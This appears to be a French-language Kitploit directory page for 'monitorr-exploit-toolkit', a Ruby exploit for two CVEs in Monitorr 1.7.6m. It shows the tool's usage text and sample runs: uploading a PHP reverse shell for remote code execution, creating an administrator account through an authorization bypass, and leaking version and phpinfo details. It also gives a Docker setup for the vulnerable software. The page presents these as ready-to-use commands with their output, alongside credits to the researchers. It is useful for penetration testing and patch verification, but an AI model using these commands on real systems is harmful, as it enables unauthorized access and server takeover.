Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
monitorr-exploit-toolkit — Multiple exploits for Monitorr | Kitploit
Outils/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Multiple exploits for Monitorr

Voir le dépôt
101il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Kit d'exploitation Monitorr

  • RCE via téléversement de fichier non sécurisé (reverse shell PHP, webshell, etc.)
  • Création de compte administrateur via contournement d'autorisation
  • Fuite d'informations techniques : version de Monitorr, version de PHP, version du système et noyau, configuration PHP, etc.

Exploit pour CVE-2020-28872 et CVE-2020-28871.

[PacketStorm]

Utilisation

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

Exemples

Téléverser un reverse shell :

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

Création d'un compte administrateur :

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Obtenir la version de Monitorr :

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

Obtenir phpinfp() :

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

Prérequis

  • httpx
  • docopt.rb

Exemple avec gem :

root@kitploit:~
bundle install
# or
gem install httpx docopt

Déploiement Docker du logiciel vulnérable

Attention : cette configuration n'est bien sûr pas adaptée à une utilisation en production !

root@kitploit:~
$ sudo docker-compose up

Configurer / initialiser l'application à l'adresse http://127.0.0.1:7000/monitorr/settings.php.

Limitations

  • Upload : le fichier téléversé doit avoir un octet magique d'image (ex. GIF) afin de correspondre à getimagesize (code)
  • Create : le mot de passe utilisé lors de la création du compte doit comporter au moins 6 caractères (limite minimale de l'application)

Références

  • Logiciel cible : Monitorr
    • Source : https://github.com/Monitorr/Monitorr/
    • Docker : https://hub.docker.com/r/monitorr/monitorr/
    • Version vulnérable : 1.7.6m

Ceci est une meilleure réécriture et fusion de EDB-48981 (CVE-2020-28872) et EDB-48980 (CVE-2020-28871) avec des fonctionnalités supplémentaires.

Les vulnérabilités de téléversement et de création de compte administrateur ont été découvertes par Lyhin's Lab. Les fuites de phpinfo et de version de Monitorr ont été découvertes par Alexandre ZANNI aka noraj.

Analyse de l'exploit et de la vulnérabilité d'origine :

  • Comment fonctionne le hacking White-Box : contournement d'autorisation et exécution de code à distance dans Monitorr 1.7.6
Télécharger l’outil